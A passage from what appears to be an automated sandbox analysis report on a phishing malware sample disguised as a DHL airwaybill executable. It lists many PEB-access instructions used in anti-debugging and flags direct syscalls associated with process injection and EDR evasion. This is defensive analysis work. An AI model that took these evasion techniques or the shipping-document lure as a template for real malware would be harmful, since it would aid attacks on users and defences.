            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1260B mov eax, dword ptr fs:[00000030h]3_2_01B1260B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1260B mov eax, dword ptr fs:[00000030h]3_2_01B1260B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1260B mov eax, dword ptr fs:[00000030h]3_2_01B1260B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E609 mov eax, dword ptr fs:[00000030h]3_2_01B7E609
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B32674 mov eax, dword ptr fs:[00000030h]3_2_01B32674
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC866E mov eax, dword ptr fs:[00000030h]3_2_01BC866E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC866E mov eax, dword ptr fs:[00000030h]3_2_01BC866E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A660 mov eax, dword ptr fs:[00000030h]3_2_01B3A660
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A660 mov eax, dword ptr fs:[00000030h]3_2_01B3A660
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1C640 mov eax, dword ptr fs:[00000030h]3_2_01B1C640
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B889B3 mov esi, dword ptr fs:[00000030h]3_2_01B889B3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B889B3 mov eax, dword ptr fs:[00000030h]3_2_01B889B3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B889B3 mov eax, dword ptr fs:[00000030h]3_2_01B889B3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B129A0 mov eax, dword ptr fs:[00000030h]3_2_01B129A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B009AD mov eax, dword ptr fs:[00000030h]3_2_01B009AD
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B009AD mov eax, dword ptr fs:[00000030h]3_2_01B009AD
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B329F9 mov eax, dword ptr fs:[00000030h]3_2_01B329F9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B329F9 mov eax, dword ptr fs:[00000030h]3_2_01B329F9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8E9E0 mov eax, dword ptr fs:[00000030h]3_2_01B8E9E0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A9D0 mov eax, dword ptr fs:[00000030h]3_2_01B0A9D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A9D0 mov eax, dword ptr fs:[00000030h]3_2_01B0A9D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A9D0 mov eax, dword ptr fs:[00000030h]3_2_01B0A9D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A9D0 mov eax, dword ptr fs:[00000030h]3_2_01B0A9D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A9D0 mov eax, dword ptr fs:[00000030h]3_2_01B0A9D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A9D0 mov eax, dword ptr fs:[00000030h]3_2_01B0A9D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B349D0 mov eax, dword ptr fs:[00000030h]3_2_01B349D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCA9D3 mov eax, dword ptr fs:[00000030h]3_2_01BCA9D3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B969C0 mov eax, dword ptr fs:[00000030h]3_2_01B969C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8892A mov eax, dword ptr fs:[00000030h]3_2_01B8892A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B9892B mov eax, dword ptr fs:[00000030h]3_2_01B9892B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8C912 mov eax, dword ptr fs:[00000030h]3_2_01B8C912
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF8918 mov eax, dword ptr fs:[00000030h]3_2_01AF8918
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF8918 mov eax, dword ptr fs:[00000030h]3_2_01AF8918
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E908 mov eax, dword ptr fs:[00000030h]3_2_01B7E908
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E908 mov eax, dword ptr fs:[00000030h]3_2_01B7E908
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA4978 mov eax, dword ptr fs:[00000030h]3_2_01BA4978
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA4978 mov eax, dword ptr fs:[00000030h]3_2_01BA4978
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8C97C mov eax, dword ptr fs:[00000030h]3_2_01B8C97C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B26962 mov eax, dword ptr fs:[00000030h]3_2_01B26962
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B26962 mov eax, dword ptr fs:[00000030h]3_2_01B26962
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B26962 mov eax, dword ptr fs:[00000030h]3_2_01B26962
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B4096E mov eax, dword ptr fs:[00000030h]3_2_01B4096E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B4096E mov edx, dword ptr fs:[00000030h]3_2_01B4096E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B4096E mov eax, dword ptr fs:[00000030h]3_2_01B4096E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4940 mov eax, dword ptr fs:[00000030h]3_2_01BD4940
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B80946 mov eax, dword ptr fs:[00000030h]3_2_01B80946
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8C89D mov eax, dword ptr fs:[00000030h]3_2_01B8C89D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B00887 mov eax, dword ptr fs:[00000030h]3_2_01B00887
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3C8F9 mov eax, dword ptr fs:[00000030h]3_2_01B3C8F9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3C8F9 mov eax, dword ptr fs:[00000030h]3_2_01B3C8F9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCA8E4 mov eax, dword ptr fs:[00000030h]3_2_01BCA8E4
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E8C0 mov eax, dword ptr fs:[00000030h]3_2_01B2E8C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD08C0 mov eax, dword ptr fs:[00000030h]3_2_01BD08C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA483A mov eax, dword ptr fs:[00000030h]3_2_01BA483A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA483A mov eax, dword ptr fs:[00000030h]3_2_01BA483A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A830 mov eax, dword ptr fs:[00000030h]3_2_01B3A830
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B22835 mov eax, dword ptr fs:[00000030h]3_2_01B22835
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B22835 mov eax, dword ptr fs:[00000030h]3_2_01B22835
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B22835 mov eax, dword ptr fs:[00000030h]3_2_01B22835
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B22835 mov ecx, dword ptr fs:[00000030h]3_2_01B22835
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B22835 mov eax, dword ptr fs:[00000030h]3_2_01B22835
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B22835 mov eax, dword ptr fs:[00000030h]3_2_01B22835
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8C810 mov eax, dword ptr fs:[00000030h]3_2_01B8C810
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B96870 mov eax, dword ptr fs:[00000030h]3_2_01B96870
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B96870 mov eax, dword ptr fs:[00000030h]3_2_01B96870
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8E872 mov eax, dword ptr fs:[00000030h]3_2_01B8E872
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8E872 mov eax, dword ptr fs:[00000030h]3_2_01B8E872
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B30854 mov eax, dword ptr fs:[00000030h]3_2_01B30854
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B04859 mov eax, dword ptr fs:[00000030h]3_2_01B04859
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B04859 mov eax, dword ptr fs:[00000030h]3_2_01B04859
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B12840 mov ecx, dword ptr fs:[00000030h]3_2_01B12840
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB4BB0 mov eax, dword ptr fs:[00000030h]3_2_01BB4BB0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB4BB0 mov eax, dword ptr fs:[00000030h]3_2_01BB4BB0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10BBE mov eax, dword ptr fs:[00000030h]3_2_01B10BBE
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10BBE mov eax, dword ptr fs:[00000030h]3_2_01B10BBE
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B08BF0 mov eax, dword ptr fs:[00000030h]3_2_01B08BF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B08BF0 mov eax, dword ptr fs:[00000030h]3_2_01B08BF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B08BF0 mov eax, dword ptr fs:[00000030h]3_2_01B08BF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8CBF0 mov eax, dword ptr fs:[00000030h]3_2_01B8CBF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2EBFC mov eax, dword ptr fs:[00000030h]3_2_01B2EBFC
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAEBD0 mov eax, dword ptr fs:[00000030h]3_2_01BAEBD0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B20BCB mov eax, dword ptr fs:[00000030h]3_2_01B20BCB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B20BCB mov eax, dword ptr fs:[00000030h]3_2_01B20BCB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B20BCB mov eax, dword ptr fs:[00000030h]3_2_01B20BCB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B00BCD mov eax, dword ptr fs:[00000030h]3_2_01B00BCD
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B00BCD mov eax, dword ptr fs:[00000030h]3_2_01B00BCD
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B00BCD mov eax, dword ptr fs:[00000030h]3_2_01B00BCD
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2EB20 mov eax, dword ptr fs:[00000030h]3_2_01B2EB20
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2EB20 mov eax, dword ptr fs:[00000030h]3_2_01B2EB20
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC8B28 mov eax, dword ptr fs:[00000030h]3_2_01BC8B28
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BC8B28 mov eax, dword ptr fs:[00000030h]3_2_01BC8B28
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7EB1D mov eax, dword ptr fs:[00000030h]3_2_01B7EB1D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7EB1D mov eax, dword ptr fs:[00000030h]3_2_01B7EB1D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7EB1D mov eax, dword ptr fs:[00000030h]3_2_01B7EB1D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7EB1D mov eax, dword ptr fs:[00000030h]3_2_01B7EB1D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7EB1D mov eax, dword ptr fs:[00000030h]3_2_01B7EB1D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7EB1D mov eax, dword ptr fs:[00000030h]3_2_01B7EB1D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7EB1D mov eax, dword ptr fs:[00000030h]3_2_01B7EB1D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7EB1D mov eax, dword ptr fs:[00000030h]3_2_01B7EB1D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7EB1D mov eax, dword ptr fs:[00000030h]3_2_01B7EB1D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4B00 mov eax, dword ptr fs:[00000030h]3_2_01BD4B00
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFCB7E mov eax, dword ptr fs:[00000030h]3_2_01AFCB7E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAEB50 mov eax, dword ptr fs:[00000030h]3_2_01BAEB50
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD2B57 mov eax, dword ptr fs:[00000030h]3_2_01BD2B57
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD2B57 mov eax, dword ptr fs:[00000030h]3_2_01BD2B57
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD2B57 mov eax, dword ptr fs:[00000030h]3_2_01BD2B57
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD2B57 mov eax, dword ptr fs:[00000030h]3_2_01BD2B57
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB4B4B mov eax, dword ptr fs:[00000030h]3_2_01BB4B4B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB4B4B mov eax, dword ptr fs:[00000030h]3_2_01BB4B4B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA8B42 mov eax, dword ptr fs:[00000030h]3_2_01BA8B42
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B96B40 mov eax, dword ptr fs:[00000030h]3_2_01B96B40
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B96B40 mov eax, dword ptr fs:[00000030h]3_2_01B96B40
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCAB40 mov eax, dword ptr fs:[00000030h]3_2_01BCAB40
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF8B50 mov eax, dword ptr fs:[00000030h]3_2_01AF8B50
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B08AA0 mov eax, dword ptr fs:[00000030h]3_2_01B08AA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B08AA0 mov eax, dword ptr fs:[00000030h]3_2_01B08AA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B56AA4 mov eax, dword ptr fs:[00000030h]3_2_01B56AA4
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B38A90 mov edx, dword ptr fs:[00000030h]3_2_01B38A90
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0EA80 mov eax, dword ptr fs:[00000030h]3_2_01B0EA80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0EA80 mov eax, dword ptr fs:[00000030h]3_2_01B0EA80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0EA80 mov eax, dword ptr fs:[00000030h]3_2_01B0EA80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0EA80 mov eax, dword ptr fs:[00000030h]3_2_01B0EA80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0EA80 mov eax, dword ptr fs:[00000030h]3_2_01B0EA80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0EA80 mov eax, dword ptr fs:[00000030h]3_2_01B0EA80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0EA80 mov eax, dword ptr fs:[00000030h]3_2_01B0EA80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0EA80 mov eax, dword ptr fs:[00000030h]3_2_01B0EA80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0EA80 mov eax, dword ptr fs:[00000030h]3_2_01B0EA80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4A80 mov eax, dword ptr fs:[00000030h]3_2_01BD4A80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3AAEE mov eax, dword ptr fs:[00000030h]3_2_01B3AAEE
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3AAEE mov eax, dword ptr fs:[00000030h]3_2_01B3AAEE
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B00AD0 mov eax, dword ptr fs:[00000030h]3_2_01B00AD0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B34AD0 mov eax, dword ptr fs:[00000030h]3_2_01B34AD0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B34AD0 mov eax, dword ptr fs:[00000030h]3_2_01B34AD0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B56ACC mov eax, dword ptr fs:[00000030h]3_2_01B56ACC
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B56ACC mov eax, dword ptr fs:[00000030h]3_2_01B56ACC
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B56ACC mov eax, dword ptr fs:[00000030h]3_2_01B56ACC
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B24A35 mov eax, dword ptr fs:[00000030h]3_2_01B24A35
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B24A35 mov eax, dword ptr fs:[00000030h]3_2_01B24A35
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3CA38 mov eax, dword ptr fs:[00000030h]3_2_01B3CA38
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3CA24 mov eax, dword ptr fs:[00000030h]3_2_01B3CA24
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2EA2E mov eax, dword ptr fs:[00000030h]3_2_01B2EA2E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8CA11 mov eax, dword ptr fs:[00000030h]3_2_01B8CA11
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7CA72 mov eax, dword ptr fs:[00000030h]3_2_01B7CA72
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7CA72 mov eax, dword ptr fs:[00000030h]3_2_01B7CA72
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAEA60 mov eax, dword ptr fs:[00000030h]3_2_01BAEA60
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3CA6F mov eax, dword ptr fs:[00000030h]3_2_01B3CA6F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3CA6F mov eax, dword ptr fs:[00000030h]3_2_01B3CA6F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3CA6F mov eax, dword ptr fs:[00000030h]3_2_01B3CA6F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtUnmapViewOfSection: Direct from: 0x77382D3CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
